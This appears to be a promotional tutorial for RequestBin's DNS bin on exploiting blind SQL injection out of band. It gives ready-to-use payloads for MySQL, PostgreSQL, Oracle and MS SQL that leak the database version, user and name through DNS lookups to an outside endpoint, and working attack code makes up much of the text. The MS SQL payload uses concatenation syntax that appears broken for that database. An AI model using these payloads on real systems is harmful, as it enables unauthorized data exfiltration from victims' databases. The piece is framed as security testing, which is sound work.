Exploiting Blind SQL Injection Using DNS Bin on RequestBin

What is Out-of-Band SQL Injection?

Out-of-Band SQL Injection is a method where attackers exfiltrate data without direct responses from the application. Instead, they use external endpoints (e.g., DNS or HTTP servers) to receive the extracted information.

How It Works:

1. Data Encoding: Sensitive data is encoded into a DNS or HTTP request.
2. Request Trigger: The vulnerable application executes an SQL query, triggering the request.
3. Data Retrieval: The attacker’s server captures the data and decodes it for analysis.

Using DNS Bin on RequestBin.net for SQLi Testing

Step 1: Generate a DNS Bin Endpoint

Visit app.requestbin.net and create a unique endpoint.

sampledns.oast.pro

Step 2: Inject Payloads into SQL Queries

Place the DNS Bin endpoint domains (e.g., sampledns.oast.pro) in SQL payloads. This directs exfiltrated data to your endpoint.

Step 3: Monitor DNS Requests

Use the RequestBin dashboard to view real-time logs of incoming DNS requests, which reveal exfiltrated data.

Exploiting SQL Databases with OOB SQL Injection

1. MySQL Example

Payload:

SELECT load_file(CONCAT('\\\\',(SELECT @@version),'.',(SELECT user()),'.', (SELECT DATABASE()),'.dnsendpoint.requestbin.net\\test.txt'));

How It Works:

• The load_file() function reads files or generates DNS queries.
• Data such as the database version, user, and name is encoded into the query and sent to dnsendpoint.requestbin.net.
• Captures data in the format:

mysql_version.user.database_name.dnsendpoint.requestbin.net

2. PostgreSQL Example

Payload:

DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function() RETURNS VOID AS $$
DECLARE exec_cmd TEXT;
DECLARE query_result_version TEXT;
DECLARE query_result_user TEXT;
BEGIN
  SELECT INTO query_result_version current_setting('server_version');
  SELECT INTO query_result_user current_user;
  exec_cmd := 'COPY table_output(content) FROM E\'\\\\\\\\'||query_result_version||'.'||query_result_user||'.dnsendpoint.requestbin.net\\test.txt\'';
  EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();

How It Works:

• The COPY function allows SQL data to be written to an external file.
• Here, it’s used to send database version and user information to dnsendpoint.requestbin.net.
• Logs show format:

postgres_version.user.dnsendpoint.requestbin.net

3. Oracle Example

Payload:

SELECT DBMS_LDAP.INIT(
  (SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(SELECT name FROM v$database)||'.dnsendpoint.requestbin.net',80
) FROM dual;

How It Works:

• The DBMS_LDAP.INIT() function triggers DNS requests.
• Encoded data (e.g., version, user, database name) is sent to the DNSBin endpoint.
• Log output showing exfiltrated data with format:

version_oracle.user_dual.user_db.dnsendpoint.requestbin.et

4. MS SQL Example

Payload:

DECLARE @a VARCHAR(1024);
DECLARE @b VARCHAR(1024);
SELECT @a = (SELECT SYSTEM_USER);
SELECT @b = (SELECT DB_NAME());
EXEC('master..xp_dirtree "\\\\'||@a||'.'||@b||'.dnsendpoint.requestbin.net\\test$"');

How It Works:

• The xp_dirtree stored procedure generates a DNS query.
• Exfiltrates the system user and database name to the DNSBin endpoint.
• DNSBin showing the captured query:

mssql_user.database_name.dnsendpoint.requestbin.net

Conclusion

Testing for Out-of-Band SQL Injection is essential for identifying vulnerabilities in modern web applications. By leveraging tools like DNS Bin on RequestBin.net, security professionals can simulate real-world attack scenarios and build effective defenses.

Get started with DNS Bin on RequestBin.net and elevate your security testing.